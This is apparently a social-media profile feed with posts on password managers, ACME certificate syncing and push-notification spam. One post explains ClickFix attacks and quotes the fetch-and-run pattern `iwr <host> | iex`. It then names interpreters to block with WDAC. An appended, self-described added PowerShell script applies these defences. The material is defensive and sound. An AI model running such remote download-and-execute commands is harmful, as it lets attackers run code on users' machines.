sometimes ian (@ecn)

241 Followers · 217 Following · 2.6K Posts

your friendly neighbourhood crow, always up to no good.

Pronouns: He/Him
Location: Vancouver, BC
Website: https://ianspence.com
OID: 1.3.6.1.4.1.61251

Oh you're colourblind? How many colours am I holding up?

*Shoves the entire pantone system directory in your face*

Hey @1password, I don't want and never wanted any of your crap AI or Watchtower features. What makes you think I'm willing to pay more for features I don't want?

Give us a cheaper plan that doesn't come with all the guff.

Did #YouTube accidentally break their RSS feeds or kill that feature off?

Because there are two DNS servers but they share the same hostname and certificate, I needed to write some tooling to help synchronize the challenge from one machine to the other, along with sharing the certificates once issued/renewed.

So I wrote a quick and simple server and client app: https://git.ecn.io/ian/certsync

certsync (git.ecn.io): Helper tool for performing ACME operations across two hosts.

It took quite a bit of work (less than I feared, thankfully) but my secure DNS servers now use short-lived and IP address validated certificates from @letsencrypt!

Browser push notifications remain one of the single largest spam deliverance systems - and all browsers, especially Chrome, are entirely complacent in it.

Google could fix this tomorrow, easily.

They won't.

https://www.infoblox.com/blog/threat-intelligence/inside-a-malicious-push-network-what-57m-logs-taught-us/

Inside a Malicious Push Network: What 57M Logs Taught Us (Infoblox Blog): A DNS misconfiguration allowed us to become an "observer on the side" of a malicious push notification operation. Here's what we learned.

Hello from sunny Vancouver.

NO WE ARE NOT.

I've seen some folks talk about PowerShell options to mitigate the risk of #ClickFix, so let's talk about how two of those are ineffective:

Using the command: `iwr <host> | iex`

- Ignores script execution policy, because Invoke-Expression treats its input as if the user had typed it out themselves.
- Ignores Constrained Language Mode for the same reason.

Neither of these is effective in protecting users. A missed opportunity from Microsoft is not blocking iex under CLM.

The big issue with #ClickFix is that there are few effective mitigation tools, but there are some things you should do:

1. Disable the Windows Script Host.
2. Remove the Run dialog (this also blocks Win+R); also, upgrade people to Windows 11.
3. If possible, use WDAC to prohibit users from opening powershell.exe, pwsh.exe, cmd.exe, and mshta.exe.

#3 is likely the most effective, but also potentially disruptive to the user if they need command line access or you have scripts that run as the user.
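An added example, not code from the post or from @ecn: a PowerShell script that applies mitigations 1 and 2 through their documented policy registry values and drafts a WDAC deny policy for the four interpreters in #3. It assumes an elevated session with the ConfigCI module available; the helper Set-PolicyDword and the ClickFixDeny.xml/.bin file names are my own.

```powershell
#Requires -RunAsAdministrator
# Added example for the ClickFix mitigations above. Set-PolicyDword and the
# ClickFixDeny.* file names are assumptions of this example, not from the post.

function Set-PolicyDword {
    param([string]$Path, [string]$Name, [int]$Value)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    Set-ItemProperty -Path $Path -Name $Name -Value $Value -Type DWord
}

# 1. Disable Windows Script Host: wscript.exe and cscript.exe then refuse to run scripts.
Set-PolicyDword -Path 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' `
                -Name 'Enabled' -Value 0

# 2. Remove the Run dialog. NoRun also disables Win+R. The per-user policy key is
#    shown here; push it to every user via GPO in practice.
Set-PolicyDword -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' `
                -Name 'NoRun' -Value 1

# 3. WDAC: deny powershell.exe, pwsh.exe, cmd.exe and mshta.exe by original file name.
#    A binary that is not installed (often pwsh.exe) is skipped rather than failing.
$targets = 'powershell.exe', 'pwsh.exe', 'cmd.exe', 'mshta.exe'
$rules = foreach ($exe in $targets) {
    $cmd = Get-Command $exe -ErrorAction SilentlyContinue
    if ($cmd) { New-CIPolicyRule -DriverFilePath $cmd.Source -Level FileName -Deny }
}

$policyXml = Join-Path $env:TEMP 'ClickFixDeny.xml'
New-CIPolicy -FilePath $policyXml -Rules $rules -UserPEs   # -UserPEs: user-mode code integrity

# WDAC is default-deny: a deny-only policy blocks every other user-mode binary too,
# so merge these rules into your existing base allow policy before deployment:
#   Merge-CIPolicy -OutputFilePath .\Merged.xml -PolicyPaths .\Base.xml, $policyXml
# Rule option 3 = Enabled:Audit Mode. Watch Microsoft-Windows-CodeIntegrity/Operational
# for would-be blocks, then remove the option (-Delete) to enforce.
Set-RuleOption -FilePath $policyXml -Option 3
ConvertFrom-CIPolicy -XmlFilePath $policyXml -BinaryFilePath (Join-Path $env:TEMP 'ClickFixDeny.bin')
```

Rolling out the deny rules in audit mode first shows which users and scheduled scripts still depend on the interpreters, which is exactly the disruption the post warns about in #3.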